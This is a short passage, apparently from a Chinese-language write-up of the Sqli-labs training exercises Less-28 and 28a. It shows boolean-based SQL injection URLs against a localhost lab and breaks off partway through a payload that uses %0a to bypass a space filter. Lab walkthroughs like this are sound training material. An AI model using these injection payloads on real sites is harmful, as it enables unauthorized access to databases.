这关不回显错误,所以不能用布尔注入。 No.28a 和上一关一样,也可以用布尔注入和时间注入: http://localhost/Sql-labs/Less-28/?id=1')and '1'=('2 //不返回 http://localhost/Sql-labs/Less-28/?id=1')and '1'=('1 //返回 1. 2. payload类似于 ?id=1') %0a and %0a if((ascii(subst...